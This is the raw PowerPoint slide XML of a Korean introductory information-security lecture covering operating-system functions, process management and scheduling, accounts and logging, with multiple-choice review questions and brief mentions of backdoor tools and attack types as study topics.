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355" r:id="rId3"/>
    <p:sldId id="471" r:id="rId4"/>
    <p:sldId id="466" r:id="rId5"/>
    <p:sldId id="1219" r:id="rId6"/>
    <p:sldId id="485" r:id="rId7"/>
    <p:sldId id="488" r:id="rId8"/>
    <p:sldId id="532" r:id="rId9"/>
    <p:sldId id="533" r:id="rId10"/>
    <p:sldId id="1220" r:id="rId11"/>
    <p:sldId id="1221" r:id="rId12"/>
    <p:sldId id="470" r:id="rId13"/>
    <p:sldId id="1176" r:id="rId14"/>
    <p:sldId id="472" r:id="rId15"/>
    <p:sldId id="473" r:id="rId16"/>
    <p:sldId id="474" r:id="rId17"/>
    <p:sldId id="475" r:id="rId18"/>
    <p:sldId id="1222" r:id="rId19"/>
    <p:sldId id="1223" r:id="rId20"/>
    <p:sldId id="1204" r:id="rId21"/>
    <p:sldId id="1206" r:id="rId22"/>
    <p:sldId id="1207" r:id="rId23"/>
    <p:sldId id="1208" r:id="rId24"/>
    <p:sldId id="1209" r:id="rId25"/>
    <p:sldId id="1210" r:id="rId26"/>
    <p:sldId id="1186" r:id="rId27"/>
    <p:sldId id="1187" r:id="rId28"/>
    <p:sldId id="1188" r:id="rId29"/>
    <p:sldId id="1189" r:id="rId30"/>
    <p:sldId id="1190" r:id="rId31"/>
    <p:sldId id="1216" r:id="rId32"/>
    <p:sldId id="1218" r:id="rId33"/>
    <p:sldId id="1217" r:id="rId34"/>
    <p:sldId id="480" r:id="rId35"/>
    <p:sldId id="481" r:id="rId36"/>
    <p:sldId id="482" r:id="rId37"/>
    <p:sldId id="476" r:id="rId38"/>
    <p:sldId id="477" r:id="rId39"/>
    <p:sldId id="478" r:id="rId40"/>
    <p:sldId id="479" r:id="rId41"/>
    <p:sldId id="507" r:id="rId42"/>
    <p:sldId id="513" r:id="rId43"/>
    <p:sldId id="514" r:id="rId44"/>
    <p:sldId id="515" r:id="rId45"/>
    <p:sldId id="516" r:id="rId46"/>
    <p:sldId id="536" r:id="rId47"/>
    <p:sldId id="517" r:id="rId48"/>
    <p:sldId id="518" r:id="rId49"/>
    <p:sldId id="519" r:id="rId50"/>
    <p:sldId id="520" r:id="rId51"/>
    <p:sldId id="521" r:id="rId52"/>
    <p:sldId id="522" r:id="rId53"/>
    <p:sldId id="468" r:id="rId54"/>
    <p:sldId id="523" r:id="rId55"/>
    <p:sldId id="524" r:id="rId56"/>
    <p:sldId id="525" r:id="rId57"/>
    <p:sldId id="526" r:id="rId58"/>
    <p:sldId id="527" r:id="rId59"/>
    <p:sldId id="528" r:id="rId60"/>
    <p:sldId id="529" r:id="rId61"/>
    <p:sldId id="530" r:id="rId62"/>
    <p:sldId id="531" r:id="rId63"/>
    <p:sldId id="1211" r:id="rId64"/>
    <p:sldId id="1151" r:id="rId65"/>
    <p:sldId id="1152" r:id="rId66"/>
    <p:sldId id="664" r:id="rId67"/>
    <p:sldId id="665" r:id="rId68"/>
    <p:sldId id="666" r:id="rId69"/>
    <p:sldId id="667" r:id="rId70"/>
    <p:sldId id="668" r:id="rId71"/>
    <p:sldId id="660" r:id="rId72"/>
    <p:sldId id="659" r:id="rId73"/>
    <p:sldId id="658" r:id="rId74"/>
    <p:sldId id="661" r:id="rId75"/>
    <p:sldId id="663" r:id="rId76"/>
    <p:sldId id="1202" r:id="rId77"/>
    <p:sldId id="308" r:id="rId78"/>
    <p:sldId id="309" r:id="rId79"/>
    <p:sldId id="310" r:id="rId80"/>
    <p:sldId id="311" r:id="rId81"/>
    <p:sldId id="315" r:id="rId82"/>
    <p:sldId id="316" r:id="rId83"/>
    <p:sldId id="317" r:id="rId84"/>
    <p:sldId id="669" r:id="rId85"/>
    <p:sldId id="312" r:id="rId86"/>
    <p:sldId id="313" r:id="rId87"/>
    <p:sldId id="314" r:id="rId88"/>
    <p:sldId id="318" r:id="rId89"/>
    <p:sldId id="319" r:id="rId90"/>
    <p:sldId id="320" r:id="rId91"/>
    <p:sldId id="321" r:id="rId92"/>
    <p:sldId id="322" r:id="rId93"/>
    <p:sldId id="323" r:id="rId94"/>
    <p:sldId id="324" r:id="rId95"/>
    <p:sldId id="326" r:id="rId96"/>
    <p:sldId id="327" r:id="rId97"/>
    <p:sldId id="1203" r:id="rId98"/>
    <p:sldId id="1155" r:id="rId99"/>
    <p:sldId id="1153" r:id="rId100"/>
    <p:sldId id="1166" r:id="rId101"/>
    <p:sldId id="1213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89C5A-622F-4D39-9853-5876A2951A41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D2C31-0A3D-4F43-9D6B-08E63575C0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52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326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44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82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20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205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996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277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86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23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35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8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988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60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60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77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613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92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0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19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28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638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321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894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6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6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BF55F-910C-41AB-B89B-F06107F1D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5308A8-8C37-40AA-9273-B9D2BA2D8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8C35E-CEEE-4341-B950-09A8867DC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72B24-76DE-450A-9BA5-14BA8A37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AF021F-F380-4956-A52B-6FD0FC80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7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6953B-AFCB-4FF5-9090-7D1F1934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2CD44E-ECDB-46F9-9521-FE4E77E15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77F84-ADEE-4B58-95F3-4C2D3F81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18EEA-86CB-465F-BADA-07E63FF7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77045E-EF2A-4C0F-A9AB-F343114E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67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07558B-2853-4C6A-AAF0-540909870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B5AFCB-DF0D-4686-BDA2-A976A17E6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CA5BB-21C7-4F12-A6D3-DB97C7D6A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B1D8B-369F-4456-8278-9C1F55CE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DFF97C-7DBD-406A-8060-A6A4A30B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82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5891" y="6492876"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr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6" descr="1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7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1" y="836712"/>
            <a:ext cx="12192001" cy="6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9304707" y="11663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정보보호 개론</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81928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673F5-F35A-4123-826A-2B88C78E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654B8-A2A8-4FBB-815E-C2AF94E6D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6BABD-DE7F-4D92-892A-C4870B5C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B3641-341B-4906-A447-A502D3735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366A8B-4B88-4576-83DD-3F854D1B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20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101D6-6F58-4DEF-A418-F60689E1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538D-9377-478D-BCF9-97715BF5D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E3782-B9F7-46CD-B995-A24E58CED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3AC94F-FBA8-431E-90E7-5190944C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4D3A4-52CB-44DF-8DF3-25D2478F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20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93664-B683-4E47-9A15-9ABCAC32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6A8ED-42F9-4467-883A-1248C1004A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D2727B-425C-44A3-A4EF-BC339A881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5556B1-7CE9-485F-AF8C-07D10716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7DCC16-663A-45AE-97AB-221D2FFF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9B0F9D-63DF-44DC-B72A-45C7CEA9F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68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67D01-827A-4D1D-82C4-D3198BBB4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10EF47-5FB8-4B18-877C-01EE8A606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FCB4BE-3E89-4344-A848-24794CCFC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3926CF-0474-4B11-8A97-3D18BBC79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F35125-5032-4454-B238-3100F00C0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3A3FA7-871C-4DAD-A8D8-7A8BB850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85509C-08A0-402D-ABA6-E9D8E99F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1BCFE-7310-4420-89A0-CFD2F9B6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84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C6CAE-7D7D-46CE-8024-CF2F72C0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5C95E8-4088-4CD9-AFE0-B2B1F041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85088F-6832-454D-BE75-D160E353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BCDD7-02FA-4506-8473-EF21E423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5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474C48-F0EC-4024-96F2-5D5FEECFF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6DFB9A-14C7-40CC-9C88-1A3C431BA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8186BF-EA2E-4999-A0FB-ABB4232C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4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339FA-9432-4DBA-ABDB-FD6B52175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94D203-AD50-43DE-B20D-ADCBD6463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F0AB99-B863-4577-98C0-2190B817B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726E3A-45B1-4A13-B4DC-1F55B80E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AEB841-69A6-49BF-A235-329C4546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2C4EB4-796D-43D9-9773-E3128726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91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A3C73-F71C-4584-8EB5-5B6C03FAE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DD4FAF-8F26-44CD-B003-5DCD4F7E1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F6ACB5-9B03-42CA-ADF7-B332C051B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5B6ED3-97B9-428D-8710-014DE4A99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2A235A-5618-4538-90A7-E9C1B8DE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5E614-0F92-4040-8F3C-8E5A8FEB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03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E4A756-BB3C-4CE5-92E4-B062D1A8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034C0-61B5-4B65-BB55-BED7E308C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8DDE5-7128-4AD1-B0A7-399397DA6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6A317-FD42-4A4A-BA0F-20F01084E394}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2024-02-20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AF152-143A-491D-A7BD-B669C316E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98F0A-E831-47E3-B6BD-FDD7F200B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8C847-4DAA-4D89-B2E7-16E5C94256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hyperlink" Target="https://www.youtube.com/watch?v=9gkVXAalet4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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.gi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bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.b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bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.b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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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gi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C3FF9-0DAA-4D07-8080-DB4B9CD8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정보보호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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2864F3-6F5B-4D07-9873-29AF11807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5576"/>
            <a:ext cx="9144000" cy="912223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사이버과학과 백도우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590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HY견고딕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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인 학습</a:t>
            </a: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]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A6FC0BB-ADBE-4EAC-9A67-99601E8237EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957682" y="1270384"/>
            <a:ext cx="8280009" cy="3087038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Q.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 중 운영체제의 주요 기능에 관한 설명으로 바르지 않은 것은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 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 사용자와 하드웨어 간의 인터페이스를 정의한다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② 고급 언어로 작성된 프로그램을 이진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(0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또는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1)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기계어로 번역한다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③ 사용자 간의 자원을 스케줄링하고 할당하는 기능을 수행한다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④ 오류 검사 및 복구 기능을 수행한다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AD33B73-1507-4052-B65F-64FD38CB9F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245928" y="2813903"/>
            <a:ext cx="468923" cy="25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백도어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100</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US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D45B1D6-43AB-413E-BE56-79321C3C5856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995079" y="1870336"/>
            <a:ext cx="8280009" cy="2075992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스쿨버스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전형적인 트로이목마로서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-15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백오리피스나</a:t>
            </a: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넷버스처럼 강력하면서 사용하기도 쉬움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11723" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="92"/>
              </a:spcBef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루트킷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가장 잘 알려진 백도어로 트로이 프로그램들의 패키지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445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HY견고딕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101</a:t>
            </a:fld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[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심화 학습</a:t>
            </a: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]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A6FC0BB-ADBE-4EAC-9A67-99601E8237EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957682" y="1270384"/>
            <a:ext cx="8280009" cy="4659264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54623" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="92"/>
              </a:spcBef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시스템에서 프로세스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/</a:t>
            </a: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스케쥴링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/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교착상태에 대해 설명하고 교착상태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4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가지 조건에 대해 설명한다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AutoNum type="arabicPeriod"/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운영체제의 감사 정책을 설명한다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시스템의 네트워크 서비스 보안 강화를 위한 도구인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 Wrapper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정의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원리을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설명하고 접근 제어 환경 설정을 위한 파일을 설정 해본다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 침해 공격 유형인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Stack buffer overflow, Buffer overflow attack, </a:t>
            </a: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Fomat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string attack, Race </a:t>
            </a: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condion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attack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기법과 대응 방안에 대하여 기술하기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37827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HY견고딕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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인 학습</a:t>
            </a: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]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A6FC0BB-ADBE-4EAC-9A67-99601E8237EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957682" y="1270384"/>
            <a:ext cx="8280009" cy="436123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Q.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 중인 프로세스와는 무관하게 발생하는 인터럽트이다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이에 해당하는 대표적인 인터럽트는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I/O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인터럽트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클럭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(Clock)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인터럽트 등을 들 수 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인터럽트를 무엇이라 하는가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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-1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동기 인터럽트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" spc="-1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(Synchronous Interrupt) </a:t>
            </a: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1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② 비동기 인터럽트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" spc="-11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(Asynchronous Interrupt)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③ 폴링 인터럽트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(Polling Interrupt) </a:t>
            </a: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④ 벡터 인터럽트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(Vector Interrupt)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AD33B73-1507-4052-B65F-64FD38CB9F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350202" y="4089251"/>
            <a:ext cx="468923" cy="25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29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99934" y="1124745"/>
            <a:ext cx="8291264" cy="56323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이론 및 일반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기능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arenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR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운영체제의 기능은 프로그램 생성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 실행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동작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시스템 조작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오류 발견 및 응답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자원할당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계정관리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보호 등의 기능이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① 프로세스 관리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하드웨어에 의존된 가장 하위단계 수준으로 프로세스 스케줄링을 통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해 실행 가능한 프로세스 추적 관리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 주기억장치 관리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주기억장치의 접근을 관리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제어하는 장치의 부분으로 주소 변환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기억 보호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기억 등의 기능을 수행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 보조기억장치 관리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하드디스크나 디스켓 등의 기억 장치에 대한 접근 관리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제어 들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수행하는 기능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④ 입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시스템 관리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컴퓨터의 입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장치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Input/Output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device : I/O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중앙시스템과 외부와 효율적인 통신방법을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⑤ 파일 관리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운영체제는 프로그램이나 데이터를 파일단위로 관리하며 저장장치에 파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단위로 저장</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR"/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072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프로세스 관리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57121" y="2204865"/>
            <a:ext cx="7200900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병행처리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스케줄링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스케줄링 알고리즘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교착상태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2A0307-E457-4515-BF8B-FD34CFBE2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228" y="1829407"/>
            <a:ext cx="6498918" cy="14608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1C96B0-9273-4AFC-92F4-B338FBCF3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657" y="3767523"/>
            <a:ext cx="7705781" cy="25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17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00977" y="836712"/>
            <a:ext cx="8291264" cy="56938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관리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개념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프로세스는 시스템 작업의 기본 단위이며 현재 수행 상태에 있는 응용프로그램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운영체제의 일부인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스케줄러 등 프로그램을 의미한다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프로세스는 생성되어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완료될때까지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다음과 같은 상태변화를 거치게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(New)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프로세스가 생성되었지만 아직 운영체제에 의해서 실행 가능한 프로세스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집합에 들어가지 못한 상태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(Running)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차지하여 실행 중인 상태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준비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(Ready)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프로세스가 실행되고 있지 않지만 즉시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사용할 수 있는 상태로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대기하고 있는 상태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(Block)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어떤 사건이 발생하기 전까지는 실행될 수 없는 상태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(Hold)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프로세스가 디스크 등에 보관되어 있는 상태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(Deadlock)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프로세서가 결코 일어날 수 없는 사건을 기다리는 상태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(Exit)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운영체제에 의해서 실행 가능한 프로세스 집합으로부터 해제된 상태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  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26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63552" y="1052736"/>
            <a:ext cx="8291264" cy="39703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관리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병행 처리와 프로세스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프로세스를 생성하는 데 필요한 작업은 다음과 같은 것이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이름을 결정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리스트에 생성된 프로세스를 추가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프로세스에 초기 우선순위를 부여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프로세스에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PCB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생성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생성된 프로세스에 초기 자원 할당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47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2"/>
            <a:ext cx="8291264" cy="59400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관리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스케줄링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(Scheduling)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스케줄링 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(queue)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프로세스 스케줄링이란 멀티 프로세스 시스템 내에 존재하는 여러 개의 프로세스 중 어떤 프로세스에게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사용권을 넘겨줄 것인가를 결정하는 일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프로세스 시스템에서는 생성된 프로세스는 일단 준비상태로 넘어가게 되고 준비 상태에서는 운영체제가 이들을 큐에 보관하고 관리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대기큐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하면서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사용 가능해지게 되면 대기 큐에서 몇 개의 프로세스 중 한 프로세스에게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사용권을 넘겨준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기준에 입각해서 프로세스의 실행순서를 결정하는 일을 프로세스 스케줄링이라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스케줄링 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(Scheduling Queue)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다음과 같은 상태로 구분한다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① 준비 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(ready queue)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주기억장치에 적재되어 있으면서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의해 실행되기를 준비하는 프로세스들로 구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리스트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 작업 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(job queue)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주기억장치의 할당을 기다리며 대용량의 기억장치에 있는 프로세스들로 구성된 리스트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 장치 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(device queue)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•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특정한 입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장치를 기다리고 있는 프로세스로 구성된 리스트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5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2"/>
            <a:ext cx="8291264" cy="52014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관리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스케줄링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(Scheduling)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스와핑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(swapping)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프로세스 스케줄링은 준비 완료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(Ready)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상태에 있는 프로세스들 중 어느 것을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할당시킬 것인가를 결정하는 문제를 취급하는 것으로서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CPU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효율 및 처리량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(Throughput)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의최대화와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반환 시간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(Turnaround Time)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최소화에 그 목적을 두고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① 장기 스케줄러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또는 작업 스케줄러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저장소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프로세스들을 선택하여 실행하기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위해 기억장치로 적재한다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 단기 스케줄러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스케줄러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 준비가 되어 있는 프로세스 중에서 선택하여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이들 중 하나에게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CPU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할당하는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 중기 스케줄링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기억장치에서 프로세스들을 제거하여 다중 프로그래밍의 정도를 완화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하는 것이 바람직할 때가 있다는 것에서 유래한 것으로 프로세스는 중기 스케줄러에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의하여 교체되어 나가고 후에 다시 교체되어 들어온다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2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HY견고딕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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인 학습</a:t>
            </a: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]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A6FC0BB-ADBE-4EAC-9A67-99601E8237EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957682" y="1270384"/>
            <a:ext cx="8280009" cy="452743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Q.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 지문은 무엇을 설명하는 것인가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-5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실행 중인 프로그램</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-5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-5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프로시저가 활동 중인 것</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-5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비동기적인 행위를 일으키는 주체</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-5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 PCB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-5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존재로서 명시되는 것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 페이지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② 프로세스 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③ 모니터 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④세그먼테이션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AD33B73-1507-4052-B65F-64FD38CB9F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350202" y="4257693"/>
            <a:ext cx="468923" cy="25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6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HY견고딕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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인 학습</a:t>
            </a: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]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A6FC0BB-ADBE-4EAC-9A67-99601E8237EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957682" y="1270384"/>
            <a:ext cx="8280009" cy="436123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Q. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="2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프로세스 제어 블록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" spc="2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(PCB, Process Control Block)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="2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은 특정 프로세스에 대한 정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보를 보관하는 일종의 테이블이다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여기에 보관되는 정보가 아닌 것은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 프로세스의 우선순위 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②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CPU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사용시간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③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CPU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사용률 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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④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CPU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각종 레지스터 상태를 가리키는 포인터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AD33B73-1507-4052-B65F-64FD38CB9F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350202" y="4057166"/>
            <a:ext cx="468923" cy="25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프로세스 제어 블록 (PCB: Process Control Block) 알아보기">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2DD05A0-A2DB-4132-9049-2A583622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619" y="2806654"/>
            <a:ext cx="4716604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9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99934" y="1124744"/>
            <a:ext cx="8291264" cy="43396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이론 및 일반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개요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기능 및 구조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arenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR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(Operating System)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메모리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 장치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프로세서 등과 같은 모든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자원을 관리하는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응용 프로그램의 운영을 위하여 이들이 요구하는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자원의 가용성을 최적화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정보시스템 보안의 기본적인 제공자이다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운영체제는 다양한 프로그래밍 개념을 지원하고 다중프로그래밍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(multi-programming)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자원의 공유를 허용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR"/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9642" y="1882409"/>
            <a:ext cx="4288353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및 패스워드 관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400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제어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(Access Control)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세션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(Session)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51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보안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542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계정 및 패스워드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944704" y="1892547"/>
            <a:ext cx="8543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그룹 목록 확인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net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localgroup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175" y="2708920"/>
            <a:ext cx="7867650" cy="36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6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계정 및 패스워드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944704" y="1892546"/>
            <a:ext cx="854378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유닉스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그룹 목록 확인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/group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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/group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143" y="3068960"/>
            <a:ext cx="8136904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로그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944704" y="1892547"/>
            <a:ext cx="854378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Authentication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자신의 신원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(Identity)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시스템에 증명하는 과정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일반적인 경우가 아이디와 패스워드를 입력하는 과정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아이디가 신원을 나타내고 패스워드가 정상이면 인증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Authorization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올바른 패스워드를 입력해 시스템에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허락된 사용자라고 판명되어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로그인되는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Accounting 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접근한 객체나 파일에 대한 기록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추적을 위한 로그의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충실도를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책임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추적성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(Accountability)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59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윈도우 로그 종류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24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5" y="2060849"/>
            <a:ext cx="8286750" cy="41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29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유닉스 로그 종류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25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2060849"/>
            <a:ext cx="7704857" cy="4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41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</a:rPr>
                <a:t>공유 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>폴데</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 사용 권한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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2207569" y="4149080"/>
            <a:ext cx="7573963" cy="2592388"/>
            <a:chOff x="470" y="646"/>
            <a:chExt cx="4771" cy="1633"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 4"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4237" y="790"/>
              <a:ext cx="1004" cy="834"/>
              <a:chOff x="4471" y="1508"/>
              <a:chExt cx="1004" cy="834"/>
            </a:xfrm>
          </p:grpSpPr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4628" y="1508"/>
                <a:ext cx="847" cy="747"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="0" y="720"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="816" y="720"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="816" y="144"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="480" y="144"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="384" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="96" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="144"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="720"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="816" h="720">
                    <a:moveTo>
                      <a:pt x="0" y="720"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="816" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72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FF99"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFCC00"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gra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dist="45791" dir="2021404" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="777777"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" tIns="27432" bIns="27432" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr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2" name="AutoShape 6"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4517" y="1750"/>
                <a:ext cx="945" cy="498"/>
              </a:xfrm>
              <a:prstGeom prst="parallelogram">
                <a:avLst>
                  <a:gd name="adj" fmla="val 21084"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFF99"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFCC00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45791" dir="2021404" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="777777"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" tIns="27432" bIns="210312" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" b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Data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="73" name="Group 7"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4471" y="1996"/>
